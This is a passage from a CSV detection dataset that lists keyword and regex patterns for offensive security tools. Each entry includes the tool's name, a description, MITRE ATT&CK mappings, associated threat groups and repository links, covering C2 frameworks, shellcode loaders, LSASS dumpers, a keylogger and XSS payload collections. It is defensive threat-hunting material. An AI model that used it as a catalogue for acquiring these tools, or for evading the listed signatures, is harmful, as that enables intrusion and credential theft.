T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","0","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*xor.py *.dll*",".{0,1000}xor\.py\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*XOR_b64_encrypted*covenant.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}covenant\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*XOR_b64_encrypted*covenant2.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}covenant2\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*XOR_b64_encrypted*havoc.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}havoc\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*xor_crypt_and_encode(*",".{0,1000}xor_crypt_and_encode\(.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*xor_encrypt(*",".{0,1000}xor_encrypt\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*xor_payload*",".{0,1000}xor_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","623","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*xor-bin.py *.exe*",".{0,1000}xor\-bin\.py\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*xoreaxeaxeax*",".{0,1000}xoreaxeaxeax.{0,1000}","offensive_tool_keyword","Github Username","github username hosting obfuscation and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xoreaxeaxeax","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*XorEncoder.py*",".{0,1000}XorEncoder\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*XOR-Payloads.py*",".{0,1000}XOR\-Payloads\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*xpipe \\*",".{0,1000}xpipe\s\\\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe*lsass*",".{0,1000}xpipe.{0,1000}lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.c*",".{0,1000}xpipe\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.cna*",".{0,1000}xpipe\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.o*",".{0,1000}xpipe\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpn*ntlmquic*",".{0,1000}xpn.{0,1000}ntlmquic.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*xrdp.c*",".{0,1000}xrdp\.c.{0,1000}","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. iOS and Android).can be used by attacker","T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","10","5290","1706","2024-05-01T17:03:11Z","2011-04-25T14:31:17Z" "*Xre0uS/MultiDump*",".{0,1000}Xre0uS\/MultiDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*xRET2pwn/PickleC2*",".{0,1000}xRET2pwn\/PickleC2.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*XRMod_h64e.exe*",".{0,1000}XRMod_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*Xrulez + XRMod.rwdi.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*Xrulez + XRMod.x64.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*Xrulez + XRMod.x86.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez binaries.zip*",".{0,1000}XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.%2B.XRMod.rwdi.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.%2B.XRMod.x64.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.%2B.XRMod.x86.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.+.XRMod.x64.binaries*",".{0,1000}XRulez\.\+\.XRMod\.x64\.binaries.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.exe *",".{0,1000}XRulez\.exe\s.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez_h64d.dll*",".{0,1000}XRulez_h64d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez_h64e.exe*",".{0,1000}XRulez_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez_rwdi86d.dll*",".{0,1000}XRulez_rwdi86d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulezDll_rwdi64.dll*",".{0,1000}XRulezDll_rwdi64\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*xs.exe -connect *",".{0,1000}xs\.exe\s\-connect\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*xscreensaver_log_priv_esc*",".{0,1000}xscreensaver_log_priv_esc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*xshell_xftp_password.md*",".{0,1000}xshell_xftp_password\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*XSpear -u *",".{0,1000}XSpear\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*xspy -display*",".{0,1000}xspy\s\-display.{0,1000}","offensive_tool_keyword","xspy -display","Keylogger Monitors keystrokes even the keyboard is grabbed.","T1056 - T1059 - T1007 - T1113","TA0006 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/mnp/xspy/blob/master/xspy.c","1","0","N/A","N/A","1","23","16","2018-03-19T12:16:25Z","2011-07-26T18:37:00Z" "*xsrfprobe -u *",".{0,1000}xsrfprobe\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*xsser -u * -g */login?password=* --Coo*",".{0,1000}xsser\s\-u\s.{0,1000}\s\-g\s.{0,1000}\/login\?password\=.{0,1000}\s\-\-Coo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*XSS-labs*",".{0,1000}XSS\-labs.{0,1000}","offensive_tool_keyword","xss-labs","small set of PHP scripts to practice exploiting XSS and CSRF injection vulns","T1059.003 - T1190 - T1600","TA0002 - TA0007 - ","N/A","N/A","Web Attacks","https://github.com/paralax/xss-labs","1","1","N/A","N/A","1","55","27","2017-12-22T19:38:15Z","2016-03-24T19:43:37Z" "*XSS-Payloads*",".{0,1000}XSS\-Payloads.{0,1000}","offensive_tool_keyword","XSS-Payloads","A fine collection of selected javascript payloads.","T1059 - T1068 - T1071 - T1506","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://www.xss-payloads.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*xssrays.js*",".{0,1000}xssrays\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*xssrays.rb*",".{0,1000}xssrays\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*xssrays_spec.rb*",".{0,1000}xssrays_spec\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*xssraysdetail.rb*",".{0,1000}xssraysdetail\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*xssraysscan.rb*",".{0,1000}xssraysscan\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - 